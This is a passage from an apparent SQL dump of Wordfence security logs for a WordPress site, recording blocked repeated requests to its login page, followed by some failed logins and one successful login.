Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7949,1564624122.186004,1564624121.770300,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7950,1564624121.366730,1564624120.611700,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7951,1564624120.065415,1564624119.466600,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7952,1564624119.019032,1564624118.571900,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7953,1564624118.175164,1564624117.661300,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7954,1564624117.166235,1564624116.677000,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7955,1564624116.146682,1564624115.692400,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7956,1564624115.237002,1564624114.748700,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7957,1564624114.305272,1564624113.882200,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7958,1564624113.499355,1564624113.113200,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7959,1564624112.746996,1564624112.336600,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7960,1564624111.911262,1564624111.562200,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7961,1564624111.205905,1564624110.793300,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7962,1564624110.371450,1564624109.931600,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7963,1564624109.465921,1564624109.020200,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7964,1564624108.605105,1564624108.136700,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7965,1564624107.711001,1564624107.142200,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7966,1564624106.618398,1564624105.868400,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7967,1564624105.411862,1564624104.975000,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7968,1564624104.537183,1564624103.878700,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7969,1564624103.302550,1564624102.787300,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7970,1564624102.238940,1564624101.563500,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7971,1564624101.051522,1564624100.097300,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7972,1564624099.484428,1564624098.881200,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7973,1564624098.480707,1564624098.007900,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7974,1564624097.588618,1564624097.145700,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7975,1564624096.665401,1564624096.210300,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7976,1564624095.728813,1564624095.259300,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7977,1564624094.722955,1564624094.208200,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7978,1564624093.699600,1564624093.319000,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7979,1564624092.910232,1564624092.463900,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7980,1564624092.055884,1564624091.607600,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7981,1564624091.159466,1564624090.718800,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7982,1564624090.315760,1564624089.884300,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7983,1564624089.495265,1564624089.060200,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7984,1564624088.620219,1564624088.238900,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7985,1564624087.842577,1564624087.460600,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7986,1564624087.070773,1564624086.604600,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7987,1564624086.058360,1564624085.619300,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7988,1564624085.237688,1564624084.821900,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7989,1564624084.405955,1564624083.775200,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7990,1564624083.261432,1564624082.817600,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7991,1564624082.329961,1564624081.826600,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7992,1564624081.319104,1564624080.901200,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7993,1564624080.462972,1564624079.127400,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7994,1564624078.248178,1564624077.796100,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7995,1564624077.353902,1564624076.851500,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7996,1564624076.326720,1564624075.894600,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7997,1564624075.437094,1564624074.984300,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7998,1564624074.537863,1564624074.100200,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7999,1564624073.165084,1564624072.616000,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(8000,1564624072.152436,1564624071.700600,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(8001,1564624071.281609,1564624070.906900,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(8002,0.000000,1564671880.725855,'\0\0\0\0\0\0\0\0\0\0i%',0,200,0,1,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','loginFailValidUsername',NULL,NULL),(8003,0.000000,1564671897.580580,'\0\0\0\0\0\0\0\0\0\0i%',0,200,0,0,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','loginFailInvalidUsername',NULL,NULL),(8004,0.000000,1564671906.032341,'\0\0\0\0\0\0\0\0\0\0i%',0,200,0,0,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','loginFailInvalidUsername',NULL,NULL),(8005,0.000000,1564671920.981325,'\0\0\0\0\0\0\0\0\0\0i%',0,200,0,1,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','loginFailValidUsername',NULL,NULL),(8006,0.000000,1564671929.854094,'\0\0\0\0\0\0\0\0\0\0i%',0,200,0,1,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','loginFailValidUsername',NULL,NULL),(8007,0.000000,1564671959.619278,'\0\0\0\0\0\0\0\0\0\0i%',0,200,0,1,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','loginFailValidUsername',NULL,NULL),(8008,0.000000,1564671984.334303,'\0\0\0\0\0\0\0\0\0\0i%',0,200,0,1,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','loginFailValidUsername',NULL,NULL),(8009,0.000000,1564672011.318512,'\0\0\0\0\0\0\0\0\0\0i%',0,200,0,0,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','loginFailInvalidUsername',NULL,NULL),(8010,0.000000,1564672025.868747,'\0\0\0\0\0\0\0\0\0\0i%',0,200,0,0,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','loginFailInvalidUsername',NULL,NULL),(8011,0.000000,1564672301.708469,'\0\0\0\0\0\0\0\0\0\0i%',0,200,0,1,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','loginFailValidUsername',NULL,NULL),(8012,0.000000,1564672307.885938,'\0\0\0\0\0\0\0\0\0\0i%',0,302,0,1,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','loginOK',NULL,NULL),(8013,0.000000,1564673791.840282,'\0\0\0\0\0\0\0\0\0\0i!',0,200,0,0,0,'https://companyregistration.online/sa-company-registration/','https://companyregistration.online/sa-company-registration/','Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A605F Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8014,0.000000,1564673838.715177,'\0\0\0\0\0\0\0\0\0\0i!',0,200,0,0,0,'https://companyregistration.online/my-account/lost-password/','https://companyregistration.online/my-account/lost-password/','Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A605F Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile 